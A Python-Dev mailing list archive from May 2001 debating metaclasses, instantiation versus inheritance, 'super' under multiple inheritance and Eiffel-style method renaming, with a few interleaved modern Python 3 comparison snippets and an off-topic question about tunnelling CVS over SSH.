Date: Thu, 03 May 2001 09:49:37 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>
Message-ID: <3AF10D91.802C8555@lemburg.com>

Greg Ewing wrote:
>
> "M.-A. Lemburg" :
>
> > I'm not sure I can follow you here: DictType.__repr__ is the
> > representation method of the dictionary and not inherited
> > from TypeType, so there should be no problem.
>
> The problem is that DictType.__repr__ could mean either
> the unbound method for finding the repr of a dictionary,
> or the bound method for finding the repr of DictType
> itself.
>
> This ambiguity is inherent in the Python language as soon
> as you try to make classes into instances (which you have
> to do as a consequence of making types into classes).

We are actually trying to turn classes into types here :-)

Really, I think that we could resolve this issue by not inheriting
from meta-classes. DictType is a creation of the meta-class
TypeType. I'm not calling these instances to prevent additional
confusion. The root of the problem is that for some reason there
is a belief that DictType should implicitly inherit attributes and
methods from TypeType. If we simply say that there is no implicit
inheritance (only explicit one), then these problems should go
away.

Some of these ideas are buried in the "super" part of this
thread. Unfortunately this concept doesn't go very far since
Python has multiple inheritance and thus the term "super"
(referring to the class' single base class) is not well-defined.

As Jim mentioned in his reply to Thomas' question, Smalltalk
has two parallel hierarchies. One for the classes and one for
the meta-classes. If we follow the same path in Python and
keep the two well separated, I think we can resolve many of
the issues which are currently showing up.

To link the two hierarchies together we don't need a "super"
concept, but instead a way to reach the meta-class in charge
of a class, say "klass.__creator__".

Note that there's another issue hiding in all this and again
this is due to multiple inheritance: which meta-class is in
charge of a class which is derived from two classes having
different meta-classes ?
  meta1 --> o klass1
              o klass1a
              o klass1b
  meta2 --> o klass2
              o klass2a
              o klass2b

  class klass3(klass1a, klass2b):
      ...

I think there's no clean way to resolve this, so I'd suggest
to simply rule this out and declare it illegal (class can
only be based on classes having the same meta-class).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting: http://www.egenix.com/
Python Software: http://www.lemburg.com/python/

From barry at digicool.com Thu May 3 10:24:16 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 3 May 2001 04:24:16 -0400
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com>
Message-ID: <15089.5552.164307.344721@anthem.wooz.org>

>>>>> "M" == M writes:

    M> Here's a little fun codec to play with. It encodes the input
    M> using the ROT13 encoding (which is 1-1 and idempotent).

LOL! Guess what `language' I chose to use when testing Mailman's i18n
support? :)

-Barry

From fredrik at pythonware.com Thu May 3 10:11:10 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Thu, 3 May 2001 10:11:10 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com>
Message-ID: <028a01c0d3a8$9e05f190$e46940d5@hagrid>

mal wrote:

> Here's some sample output (Netscape can unscramble this BTW):

heh. just discovered that outlook express can deal with this
too -- but only if the message comes from the usenet.

on ordinary mail, the "unscramble rot13" menu entry is disabled
(too much usability testing?)
maybe you could repost your secret message to comp.lang.python ;-)

Cheers /F

From mal at lemburg.com Thu May 3 11:05:41 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 03 May 2001 11:05:41 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com> <028a01c0d3a8$9e05f190$e46940d5@hagrid>
Message-ID: <3AF11F65.5CBF508C@lemburg.com>

Fredrik Lundh wrote:
>
> mal wrote:
>
> > Here's some sample output (Netscape can unscramble this BTW):
>
> heh. just discovered that outlook express can deal with this
> too -- but only if the message comes from the usenet.
>
> on ordinary mail, the "unscramble rot13" menu entry is disabled
> (too much usability testing?)
>
> maybe you could repost your secret message to comp.lang.python ;-)

It wasn't all that secret: I simply cut&pasted the first two
paragraphs of the message through the codec.

There was also an inaccuracy in the posting: the codec still
produces Unicode (by virtue of using the charmap codec as its
basis).

Still, it serves as a nice example of what str.decode() and
str.encode() can be used for and also demonstrates how easy it
is to install new codecs.

I think I'll repost it to c.l.p though -- with a new secret
attached to it ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting: http://www.egenix.com/
Python Software: http://www.lemburg.com/python/

From guido at digicool.com Thu May 3 16:26:22 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 09:26:22 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Thu, 03 May 2001 09:49:37 +0200."
	<3AF10D91.802C8555@lemburg.com>
References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz> <3AF10D91.802C8555@lemburg.com>
Message-ID: <200105031426.JAA07372@cj20424-a.reston1.va.home.com>

> We are actually trying to turn classes into types here :-)

Yes!  Wait till you see my next batch of checkins. :-)

> Really, I think that we could resolve this issue by not inheriting
> from meta-classes. DictType is a creation of the meta-class
> TypeType. I'm not calling these instances to prevent additional
> confusion. The root of the problem is that for some reason there
> is a belief that DictType should implicitly inherit attributes and
> methods from TypeType. If we simply say that there is no implicit
> inheritance (only explicit one), then these problems should go
> away.

Sorry, you still seem to be confused about this.  As I tried to
explain before, DictType does not *inherit* from TypeType, but it is
an *instance* of TypeType.  TypeType defines a __repr__() method for
all its instances.  This is needed so that repr(DictType) returns
"".  It is *not* inherited from TypeType!

If DictType were to inherit from something, it would inherit from the
(not yet existing) ObjectType.  ObjectType would have a __repr__
method too: it returns "".

But this method is overridden by DictType, so doesn't come into play.

Requiring explicit inheritance (whatever that may be) won't fix the
problem.

> Some of these ideas are buried in the "super" part of this
> thread. Unfortunately this concept doesn't go very far since
> Python has multiple inheritance and thus the term "super"
> (referring to the class' single base class) is not well-defined.

Not true.  While super can't always refer to a single class, the use
of super can be completely well-defined in an unambiguous way.
Given

  class D(A, B, C):
      def foo(self):
          super.foo(self)

"super.foo" is whatever would be called in D1 if we changed the class
hierarchy as follows:

  class D1(A, B, C): pass
  class D(D1):
      def foo(self):
          D1.foo(self)

The problem with super is not that it isn't well-defined.  Its problem
is that it's not enough to do what you want.  In some situations
involving multiple inheritance, it can be essential to be able to
"merge" methods of the same name defined in each of the base classes,
e.g.

  class C(A, B):
      def save(self):
          A.save(self)
          B.save(self)

So we can't use super as an argument to abandon explicitly naming the
base class of base methods.  Out of the proposed spellings that I can
remember:

  B.save(self)                  # current Python
  B.__dict__['save'](self)      # ditto, butt ugly
  B::save(self)                 # C++
  B._.save(self)                # Don Beaudry
  B.instanceMethods.save(self)  # ???

I still like current Python best!

> As Jim mentioned in his reply to Thomas' question, Smalltalk
> has two parallel hierarchies. One for the classes and one for
> the meta-classes. If we follow the same path in Python and
> keep the two well separated, I think we can resolve many of
> the issues which are currently showing up.

Yeah, but this is not the path that Python has already taken (and
which has been beaten further by Jim Fulton's ExtensionClasses).
Python's path is "turtles all the way down".  See also my old
head-exploding metaclasses paper.

> To link the two hierarchies together we don't need a "super"
> concept, but instead a way to reach the meta-class in charge
> of a class, say "klass.__creator__".

Your confusion between the "isInstanceOf" and "isInheritedFrom"
relationships seems really deep!  Super relates to inheritance.
Metaclasses relate to instantiation (of the class, as an instance of
the metaclass).

> Note that there's another issue hiding in all this and again
> this is due to multiple inheritance: which meta-class is in
> charge of a class which is derived from two classes having
> different meta-classes ?
>
>   meta1 --> o klass1
>               o klass1a
>               o klass1b
>   meta2 --> o klass2
>               o klass2a
>               o klass2b
>
>   class klass3(klass1a, klass2b):
>       ...
>
> I think there's no clean way to resolve this, so I'd suggest
> to simply rule this out and declare it illegal (class can
> only be based on classes having the same meta-class).

Unfortunately, again thanks to Jim Fulton, we can't rule this out,
because this is actually used by ExtensionClasses.  The rule (as I
interpret it) gives the first base class control; if the first base
class is a standard class, it checks whether any of the other base
classes are not standard classes, and if so, gives control to the
first such base class.  Another way to say this is that the first base
class that has a non-standard metaclass gets control.

(ExtensionClasses implements an additional rule where it requires all
except one of the base classes to define no instance variables.)  This
is an example of the importance of metaclasses done right: the
metaclass has control over such issues.  I don't think that
Smalltalk's metaclasses have this much control -- you pretty much have
a 1-1 correspondence between class and metaclass.

--Guido van Rossum (home page: http://www.python.org/~guido/)

From guido at digicool.com Thu May 3 16:28:03 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 09:28:03 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Thu, 03 May 2001 15:27:34 +1200."
	<200105030327.PAA16472@s454.cosc.canterbury.ac.nz>
References: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz>
Message-ID: <200105031428.JAA07405@cj20424-a.reston1.va.home.com>

> Guido:
>
> > Actually, I think that what's in the __dict__ is just perfect
>
> I was thinking of backwards compatibility for people who
> are hacking the __dict__ of a class directly.

Depending on how they hack it, it may still work.

> If you don't care about that, the problem is simpler.
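For comparison only (this is today's interpreter, not the 2001 code under discussion): modern Python 3 neither adopts the ExtensionClasses rule Guido describes nor bans mixing metaclasses outright. It picks the most derived metaclass among the bases, independent of base order, and raises TypeError when no single one qualifies; an explicit metaclass that derives from both resolves the conflict. A minimal sketch, where Meta1, Meta2, Meta3 and the class names are hypothetical stand-ins for the meta1/meta2 diagram:

```python
# Hypothetical stand-ins for meta1/meta2 and two of their classes.
class Meta1(type):
    pass

class Meta2(type):
    pass

class Klass1a(metaclass=Meta1):
    pass

class Klass2b(metaclass=Meta2):
    pass

def combine_unrelated():
    """Try `class klass3(klass1a, klass2b)`; return the error text, or None."""
    try:
        class Klass3(Klass1a, Klass2b):
            pass
    except TypeError as exc:
        return str(exc)
    return None

# A metaclass deriving from both is "most derived" for these bases,
# so naming it explicitly lets the combination through.
class Meta3(Meta1, Meta2):
    pass

class Klass3(Klass1a, Klass2b, metaclass=Meta3):
    pass

print(combine_unrelated())    # the "metaclass conflict" TypeError message
print(type(Klass3).__name__)  # Meta3
```

Unlike the first-base-wins rule, the choice here never depends on which base is listed first; it only asks whether one candidate metaclass is a subclass of all the others.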
--Guido van Rossum (home page: http://www.python.org/~guido/)

From skip at pobox.com Thu May 3 16:26:51 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 3 May 2001 09:26:51 -0500
Subject: [Python-Dev] OT: CVS access through firewall via SSH
Message-ID: <15089.27307.136251.862692@beluga.mojam.com>

Python-dev folks,

Sorry for the off-topic post, but I'm striking out on the various other
sources I've located so far.  Since this group seemed to have a love-hate
relationship with CVS for a while, I thought maybe someone here would be
able to steer me in the right direction.

I have to access a CVS repository through a firewall via SSH.  That is, to
get to "server" I have to tunnel through "firewall" using SSH to port
"nnn".  Using SSH to establish an interactive session to server is no
problem:

    ssh -p nnn firewall

When I'm inside the firewall, I use a CVSROOT that looks like

    :pserver:montanaro at server:/cvs/projects

I need to merge the two bits somehow to come up with a CVSROOT that will do
the tunnel automagically.  I've tried this:

    :pserver:montanaro at firewall:nnn/cvs/projects

but CVS complains

    cvs [update aborted]: connect to firewall:2401 failed: Connection refused

(port 2401 is the normal CVS port).

Any suggestions or pointers?

Thanks,

Skip

From mal at lemburg.com Thu May 3 18:08:30 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 03 May 2001 18:08:30 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz> <3AF10D91.802C8555@lemburg.com> <200105031426.JAA07372@cj20424-a.reston1.va.home.com>
Message-ID: <3AF1827E.E730F5DE@lemburg.com>

Guido van Rossum wrote:
>
> > We are actually trying to turn classes into types here :-)
>
> Yes!  Wait till you see my next batch of checkins. :-)

Looking forward to them :) BTW, can you give a good starting point into
all this (code-wise and concept-wise) ?
I'd like to play around with these new concepts a little to get a better
feeling for the possible issues (I should have done the same for the
coercion stuff a year ago: implementing mxNumber I now find that some
important hooks are missing :-().

> > Really, I think that we could resolve this issue by not inheriting
> > from meta-classes. DictType is a creation of the meta-class
> > TypeType. I'm not calling these instances to prevent additional
> > confusion. The root of the problem is that for some reason there
> > is a belief that DictType should implicitly inherit attributes and
> > methods from TypeType. If we simply say that there is no implicit
> > inheritance (only explicit one), then these problems should go
> > away.
>
> Sorry, you still seem to be confused about this.

I think it has to do with terminology: when I say "inherit"
I actually mean "the lookup is forwarded to another object".
In that sense, instances inherit from their classes and classes
from their base-classes:

  meta-class M -> o base-class A
                    o class B
                      o instance x = B()

Meta-class M controls this "inheritance scheme" and can modify it
depending on its needs.

Here's a scenario of what I have in mind:

In the above picture, say A defines an attribute A.a which is not
defined in B or as instance attribute of B(). Querying x.a would
then launch this process:

  1. x.a -> fails
  2. M.__findattr__(x, 'a') is called to find and return the attribute
  3. M.__findattr__ asks B for an attribute 'a' -> fails
  4.       -- " --     asks A       -- " --       -> success
  5.       -- " --     returns the found attribute

I know that this is somewhat different under the covers than what's
happening now, but the Python programmer will not notice this.

It most probably does not work well with the Don Beaudry hook though...
so maybe I'm simply on the wrong track here.

> As I tried to
> explain before, DictType does not *inherit* from TypeType, but it is
> an *instance* of TypeType.  TypeType defines a __repr__() method for
> all its instances.
> This is needed so that repr(DictType) returns
> "".  It is *not* inherited from TypeType!
>
> If DictType were to inherit from something, it would inherit from the
> (not yet existing) ObjectType.  ObjectType would have a __repr__
> method too: it returns "".
>
> But this method is overridden by DictType, so doesn't come into play.
>
> Requiring explicit inheritance (whatever that may be) won't fix the
> problem.

With "explicit inheritance" I meant that the programmer has to take
care of passing the lookup on to the meta-class, rather than applying
some magic which hooks together class and meta-class.

> > Some of these ideas are buried in the "super" part of this
> > thread. Unfortunately this concept doesn't go very far since
> > Python has multiple inheritance and thus the term "super"
> > (referring to the class' single base class) is not well-defined.
>
> Not true.  While super can't always refer to a single class, the use
> of super can be completely well-defined in an unambiguous way.  Given
>
>   class D(A, B, C):
>       def foo(self):
>           super.foo(self)
>
> "super.foo" is whatever would be called in D1 if we changed the class
> hierarchy as follows:
>
>   class D1(A, B, C): pass
>   class D(D1):
>       def foo(self):
>           D1.foo(self)

Nice trick -- much like the "+0" trick in math ;-)

> The problem with super is not that it isn't well-defined.  Its problem
> is that it's not enough to do what you want.  In some situations
> involving multiple inheritance, it can be essential to be able to
> "merge" methods of the same name defined in each of the base classes,
> e.g.
>
>   class C(A, B):
>       def save(self):
>           A.save(self)
>           B.save(self)
>
> So we can't use super as an argument to abandon explicitly naming the
> base class of base methods.  Out of the proposed spellings that I can
> remember:
>
>   B.save(self)                  # current Python
>   B.__dict__['save'](self)      # ditto, butt ugly
>   B::save(self)                 # C++
>   B._.save(self)                # Don Beaudry
>   B.instanceMethods.save(self)  # ???
>
> I still like current Python best!

But it doesn't help us in the very common case of mixin classes,
since there neither the method nor, sometimes, even the programmer
knows where the base method to call lives. This is why I wrote
the basemethod() helper: it looks up the right method at run-time
and thus allows writing mixin-classes which override methods of
other classes which are only known to the programmer using the
mixin and not necessarily to the one writing the mixin.

> > As Jim mentioned in his reply to Thomas' question, Smalltalk
> > has two parallel hierarchies. One for the classes and one for
> > the meta-classes. If we follow the same path in Python and
> > keep the two well separated, I think we can resolve many of
> > the issues which are currently showing up.
>
> Yeah, but this is not the path that Python has already taken (and
> which has been beaten further by Jim Fulton's ExtensionClasses).
> Python's path is "turtles all the way down".  See also my old
> head-exploding metaclasses paper.

I know... I was under the impression, though, that a little
breakage under the covers is allowed when moving from type/classes
to all types.

> > To link the two hierarchies together we don't need a "super"
> > concept, but instead a way to reach the meta-class in charge
> > of a class, say "klass.__creator__".
>
> Your confusion between the "isInstanceOf" and "isInheritedFrom"
> relationships seems really deep!  Super relates to inheritance.
> Metaclasses relate to instantiation (of the class, as an instance of
> the metaclass).

See above... I don't like implicitly binding creation of objects
with lookup paths. These two concepts don't belong together, IMHO,
since they introduce restrictions which are not really necessary.
(I have had some great experiences with loosely coupled object
systems and don't want to do without their flexibility anymore.)
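Tim's two readings of super (start from the bases of the class K whose method contains the call, or from self.__class__.__bases__) can be compared on modern Python 3, whose zero-argument super() arrived years after this thread. It refines the first reading: the search starts after the defining class but walks the MRO of type(self). In the minimal sketch below, A and D follow Tim's example; A2/D2 and the SaveMixin/Document pair are hypothetical. The mixin shows a run-time lookup along the MRO covering the case Marc-Andre's basemethod() helper targets, without the mixin naming any base class.

```python
class B:
    def foo(self):
        return ["B"]

class C:
    def foo(self):
        return ["C"]

class A(B, C):
    def foo(self):
        # Reading 1: continue after the class that *defines* this method.
        # Zero-argument super() gets that class from the __class__ cell.
        return ["A"] + super().foo()

class D(A):
    def foo(self):
        return ["D"] + super().foo()

class A2(B, C):
    def foo(self):
        # Reading 2: continue after type(self). On a D2 instance this finds
        # A2.foo again, so the call recurses until Python gives up.
        return ["A2"] + super(type(self), self).foo()

class D2(A2):
    def foo(self):
        return ["D2"] + super().foo()

def reading2_recurses():
    """Return True if calling foo() under reading 2 overflows the stack."""
    try:
        D2().foo()
    except RecursionError:
        return True
    return False

# Mixin case: SaveMixin does not know which class follows it in the MRO.
class SaveMixin:
    def save(self):
        return ["mixin"] + super().save()

class Document:
    def save(self):
        return ["document"]

class LoggedDocument(SaveMixin, Document):
    pass

print(D().foo())                # ['D', 'A', 'B']
print(reading2_recurses())      # True
print(LoggedDocument().save())  # ['mixin', 'document']
```

This is the failure Tim and Donald Beaudry point at: reading 2 only works when the calling method sits on a leaf class.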
> > Note that there's another issue hiding in all this and again
> > this is due to multiple inheritance: which meta-class is in
> > charge of a class which is derived from two classes having
> > different meta-classes ?
> >
> >   meta1 --> o klass1
> >               o klass1a
> >               o klass1b
> >   meta2 --> o klass2
> >               o klass2a
> >               o klass2b
> >
> >   class klass3(klass1a, klass2b):
> >       ...
> >
> > I think there's no clean way to resolve this, so I'd suggest
> > to simply rule this out and declare it illegal (class can
> > only be based on classes having the same meta-class).
>
> Unfortunately, again thanks to Jim Fulton, we can't rule this out,
> because this is actually used by ExtensionClasses.  The rule (as I
> interpret it) gives the first base class control; if the first base
> class is a standard class, it checks whether any of the other base
> classes are not standard classes, and if so, gives control to the
> first such base class.  Another way to say this is that the first base
> class that has a non-standard metaclass gets control.

Ouch. Still, since Jim's in control of ExtensionClass -- wouldn't
it be possible to adapt ExtensionClass to an altered scheme ?

> (ExtensionClasses implements an additional rule where it requires all
> except one of the base classes to define no instance variables.)  This
> is an example of the importance of metaclasses done right: the
> metaclass has control over such issues.  I don't think that
> Smalltalk's metaclasses have this much control -- you pretty much have
> a 1-1 correspondence between class and metaclass.

Right: more power to the meta-class :-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting: http://www.egenix.com/
Python Software: http://www.lemburg.com/python/

From paul at pfdubois.com Thu May 3 18:24:40 2001
From: paul at pfdubois.com (Paul F. Dubois)
Date: Thu, 3 May 2001 09:24:40 -0700
Subject: [Python-Dev] Multiple inheritance
Message-ID:

Pardon if this is brief and suggestive only, I am on deadlines.

Super is a mistaken concept in multiple inheritance languages. Fortunately,
Python is not brain-damaged. Its multiple inheritance model can be fixed
easily to be fully capable.

Here is a suggestive example of implementing the Eiffel model (the only one
that is theoretically sound) using "pretend" Python syntax (keyword
conservationists might like "import" where I have "rename"):

1. The simple case, X inherits from Y and in defining foo and bar needs to
use Y's version:

    class X (Y rename foo as _sfoo,
                      bar as _sbar
            ):
        def foo (self):
            self._sfoo()
            myfoostuff

Suppose D inherits from B and C, which both inherit from A.
A has a method a1 that is redefined in B but not in C.
D wishes to use both A's version as inherited via C and B's version.

    class D (B rename a1 as ba1, C rename a1 as ca1):

can now use self.ca1, self.a1

Renaming is also useful where you inherit from a utility class and the lingo
is different in the class where you want to use it. E.g. class Window (Tree
rename children as subWindows)

Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition.

From donb at abinitio.com Thu May 3 18:47:29 2001
From: donb at abinitio.com (Donald Beaudry)
Date: Thu, 03 May 2001 12:47:29 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References:
Message-ID: <200105031647.MAA25803@localhost.localdomain>

"Tim Peters" wrote,
> Given that we're using Python's search rules, the ambiguous point remaining
> is whether:
>
>     super.f()
>
> textually contained in a method of class K begins searching with:
>
>     1) K.__bases__
>
> or with:
>
>     2) self.__class__.__bases__

It can only be 1.  Using 2 will only be correct if you are in a
method defined on a leaf class.  If not in a leaf, the search will find
the method you are already in...
recursion is likely to terminate in a stack overflow ;)

-- 
Donald Beaudry                          Ab Initio Software Corp.
                                        201 Spring Street
donb at init.com                        Lexington, MA 02421
                 ...So much code, so little time...

From guido at digicool.com Thu May 3 20:48:19 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 14:48:19 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT."
References:
Message-ID: <200105031848.f43ImKg14308@odiug.digicool.com>

From guido at digicool.com Thu May 3 20:50:30 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 14:50:30 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT."
References:
Message-ID: <200105031850.f43IoVf14328@odiug.digicool.com>

> Pardon if this is brief and suggestive only, I am on deadlines.

No problem.  We appreciate it!

> Super is a mistaken concept in multiple inheritance languages. Fortunately,
> Python is not brain-damaged. Its multiple inheritance model can be fixed
> easily to be fully capable.
>
> Here is a suggestive example of implementing the Eiffel model (the only one
> that is theoretically sound) using "pretend" Python syntax (keyword
> conservationists might like "import" where I have "rename"):
>
>
> 1. The simple case, X inherits from Y and in defining foo and bar needs to
> use Y's version:
>
> class X (Y rename foo as _sfoo,
>                   bar as _sbar
>         ):
>     def foo (self):
>         self._sfoo()
>         myfoostuff

Nice!  This is similar to Jeremy's favorite way of spelling "super":

  class X(Y):
      Yfoo = Y.foo
      def foo(self):
          self.Yfoo()
          myfoostuff

> Suppose D inherits from B and C, which both inherit from A.
> A has a method a1 that is redefined in B but not in C.
> D wishes to use both A's version as inherited via C and B's version.
>
> class D (B rename a1 as ba1, C rename a1 as ca1):
>
> can now use self.ca1, self.a1
>
> Renaming is also useful where you inherit from a utility class and the lingo
> is different in the class where you want to use it. E.g. class Window (Tree
> rename children as subWindows)
>
> Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition.

Yes.

--Guido van Rossum (home page: http://www.python.org/~guido/)

From jepler at inetnebr.com Thu May 3 20:17:16 2001
From: jepler at inetnebr.com (Jeff Epler)
Date: Thu, 3 May 2001 13:17:16 -0500
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: ; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700
References:
Message-ID: <20010503131714.D21814@inetnebr.com>

On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote:
> class X (Y rename foo as _sfoo,
>                   bar as _sbar
>         ):

Why not let us spell this as:

  class X(Y):
      from Y import foo as _sfoo, bar as _sbar
      ...

Of course, then you can spell inheritance as

  class X:
      from Y import *

Right? :)

Jeff

From nas at python.ca Thu May 3 21:05:37 2001
From: nas at python.ca (Neil Schemenauer)
Date: Thu, 3 May 2001 12:05:37 -0700
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <20010503131714.D21814@inetnebr.com>; from jepler@inetnebr.com on Thu, May 03, 2001 at 01:17:16PM -0500
References: <20010503131714.D21814@inetnebr.com>
Message-ID: <20010503120537.A13708@glacier.fnational.com>

Jeff Epler wrote:
> On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote:
> > class X (Y rename foo as _sfoo,
> >                   bar as _sbar
> >         ):
>
> Why not let us spell this as:
>   class X(Y):
>       from Y import foo as _sfoo, bar as _sbar
>       ...

This already has a meaning in Python.  Paul's suggested syntax is
pretty neat, IMHO.
  Neil

From trentm at ActiveState.com Thu May 3 21:39:27 2001
From: trentm at ActiveState.com (Trent Mick)
Date: Thu, 3 May 2001 12:39:27 -0700
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <20010503120537.A13708@glacier.fnational.com>; from nas@python.ca on Thu, May 03, 2001 at 12:05:37PM -0700
References: <20010503131714.D21814@inetnebr.com> <20010503120537.A13708@glacier.fnational.com>
Message-ID: <20010503123927.B30837@ActiveState.com>

On Thu, May 03, 2001 at 12:05:37PM -0700, Neil Schemenauer wrote:
> Jeff Epler wrote:
> > On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote:
> > > class X (Y rename foo as _sfoo,
> > >                   bar as _sbar
> > >         ):
> >
> > Why not let us spell this as:
> >   class X(Y):
> >       from Y import foo as _sfoo, bar as _sbar
> >       ...
>
> This already has a meaning in Python.  Paul's suggested syntax is
> pretty neat, IMHO.

Ditto, but how do you separate the "rename" lists for multiple
inheritance?

  class X (Y rename foo as _sfoo, bar as _sbar; Z):
      pass                                    ^---- what to use here

How about:

  class X(Y, Z):
      from Y inherit foo as _yfoo, bar as _ybar
      from Z inherit foo as _zfoo, bar as _zbar

Hmmmmm. Don't know if I like that either. Just throwing out ideas.

Trent

-- 
Trent Mick
TrentM at ActiveState.com

From greg at cosc.canterbury.ac.nz Fri May 4 06:25:08 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 04 May 2001 16:25:08 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AF1827E.E730F5DE@lemburg.com>
Message-ID: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" :

> I think it has to do with terminology: when I say "inherit"
> I actually mean "the lookup is forwarded to another object".

Some OO languages munge together the instance and inheritance
relationships, but Python isn't one of them. Using terminology
that way in the context of Python is guaranteed to cause
massive confusion!
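The instance/inheritance distinction drawn here survived the type/class unification that was then in progress. On modern Python 3, with dict standing in for DictType and type for TypeType, a minimal check looks like this (an illustration on today's interpreter, not on the 2001 code under discussion):

```python
# dict is an *instance* of its metaclass, type ...
print(isinstance(dict, type))   # True
# ... but it does not *inherit* from type: its MRO is dict, then object.
print(issubclass(dict, type))   # False
print(dict.__mro__)             # (<class 'dict'>, <class 'object'>)

# repr(dict) is found through the instance relationship (type.__repr__);
# repr({}) is found through the class of the value (dict.__repr__).
print(repr(dict) == type.__repr__(dict))  # True
print(repr({}) == dict.__repr__({}))      # True

# The DictType.__repr__ ambiguity: looking the name up on the class finds
# dict's own slot in dict.__dict__, not a method bound via the metaclass.
print(dict.__repr__ is dict.__dict__["__repr__"])  # True
```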
Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,          | A citizen of NewZealandCorp, a       |
Christchurch, New Zealand          | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz      +--------------------------------------+

From greg at cosc.canterbury.ac.nz Fri May 4 06:58:20 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 04 May 2001 16:58:20 +1200 (NZST)
Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk)
In-Reply-To:
Message-ID: <200105040458.QAA16653@s454.cosc.canterbury.ac.nz>

pf at artcom-gmbh.de (Peter Funk):

> * People will confuse this with calling
>   MyBaseClass.__getitem__(....)

Given type/class/instance unification, that's exactly how it'll
be implemented. So it's not confusion, it's insightful understanding!

> This '::' operator is not at all that ugly

Well, that's a matter of opinion. But I'll concede that it's less
ugly than something like @ or $.

But in any case, it's not going to mean quite the same thing in
Python as it does in C++, so it might just confuse C++ people.

What exactly *is* it going to mean in Python, anyway? Will it have a
corresponding __magic__ method, and if so, what will it be called?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,          | A citizen of NewZealandCorp, a       |
Christchurch, New Zealand          | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz      +--------------------------------------+

From mal at lemburg.com Fri May 4 10:40:17 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 04 May 2001 10:40:17 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz>
Message-ID: <3AF26AF1.780462E2@lemburg.com>

Greg Ewing wrote:
>
> "M.-A. Lemburg" :
>
> > I think it has to do with terminology: when I say "inherit"
> > I actually mean "the lookup is forwarded to another object".
> > Some OO languages munge together the instance and inheritance > relationships, but Python isn't one of them. Using terminology > that way in the context of Python is guaranteed to cause > massive confusion! But that's exactly what I am trying to do here: separate the notion of how lookups work (inheritance) from how objects are created (instantiation)! In Python instantiation binds the new object to the creating class and all failing lookups are directed from the object to the class. OTOH, the class - base-class lookup relationship doesn't have anything to do with the creation of objects -- classes are simply bound to their base-classes per definition of the class in the sense that failing lookups are directed to the base-classes. Classes themselves are created by meta-classes. The lookup strategy between the two is defined by the meta-class. What I'm arguing for is that meta-classes should get complete control over how lookups and object creation are done. However, this will only be possible by breaking the current automatic lookup scheme at the meta-class - class boundary since otherwise you'd run into endless loops during lookups (e.g. for many of the __xxx__ methods). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Fri May 4 11:04:08 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 